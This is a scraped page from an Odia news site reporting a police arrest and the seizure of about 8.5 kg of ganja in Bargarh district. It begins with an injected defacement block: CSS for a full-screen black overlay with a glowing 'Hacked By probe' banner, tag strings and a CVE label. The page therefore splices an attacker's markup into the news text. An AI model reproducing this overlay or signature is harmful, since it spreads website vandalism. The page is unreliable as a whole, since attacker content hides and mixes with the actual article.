html,body{margin:0!important;overflow:hidden!important}#hx-imp-overlay{position:fixed;inset:0;z-index:2147483647;background:#000;color:#0f0;font-family:monospace;display:flex;align-items:center;justify-content:center;text-align:center}#hx-imp-overlay .brand{font-size:clamp(3rem,12vw,8rem);font-weight:900;text-shadow:0 0 20px #0f0,0 0 60px #0f0;animation:hxgl 2.5s infinite}@keyframes hxgl{0%,94%,100%{transform:translate(0)}96%{transform:translate(-3px,2px)}98%{transform:translate(3px,-2px)}}
HXIMP4RL9UXPK
`58; Hacked By probe `68;
[ HXIMP4rl9uxpk ]
HXIMP4rl9uxpk
CVE-2026-49049 | import vector

ଗଞ୍ଜେଇ ଜବତ : ଅଭିଯୁକ୍ତ ଗିରଫ 

User Rating: 5 / 5

Star ActiveStar ActiveStar ActiveStar ActiveStar Active
 

ବରଗଡ :- ବରଗଡ ଜିଲ୍ଲା ପାଇକମାଲ ଥାନା ଅନ୍ତର୍ଗତ ସାଲେପାଲି ଗ୍ରାମ ନିକଟରେ ପାଇକମାଲ ଥାନା ଅଧିକାରୀ ଶ୍ରୀ ବିଶ୍ୱଜିତ ମନବୋଧ ଙ୍କର ନେତୃତ୍ୱରେ ପୋଲିସ ଟିମ ସୁରେଶ ମେହେର ନାମକ ଜଣେ ବ୍ୟକ୍ତି କୁ ଗିରଫ କରି ତାର ନିକଟରୁ ପ୍ରାୟ ସାଢ଼େ ଆଠ କେଜି ଗଞ୍ଜେଇ ଜବତ କରିଛି । ପ୍ରାପ୍ତ ସୂଚନା ଅନୁସାରେ ବିଶ୍ୱସ୍ଥ ସୂତ୍ରରୁ ଖବର ପାଇ ଥାନା ଅଧିକାରୀ ଅଭିଯୁକ୍ତ ସୁରେଶର ପିଛା କରି  ଧରିବାରେ ସକ୍ଷମ ହୋଇଥିଲେ । ଅଭିଯୁକ୍ତ ସୁରେଶ ନିକଟରୁ ନଗଦ ଟଙ୍କା , ଏକ ବାଇକ , ଓ ଏକ ମୋବାଇଲ ଫୋନ ଜବତ କରି ଅଭିଯୁକ୍ତ ସୁରେଶକୁ କେଶ ନମ୍ବର 61 / 21 ଧାରା 20 (b)(ii)(B)NDPS ଆକ୍ଟ ରେ ମୁକଦମା ରୁଜୁ କରି କୋର୍ଟ ଚାଲାଣ କରିଥିବା ଥାନା ଅଧିକାରୀ ସୂଚନା ପ୍ରଦାନ କରିଛନ୍ତି ।

0
0
0
s2sdefault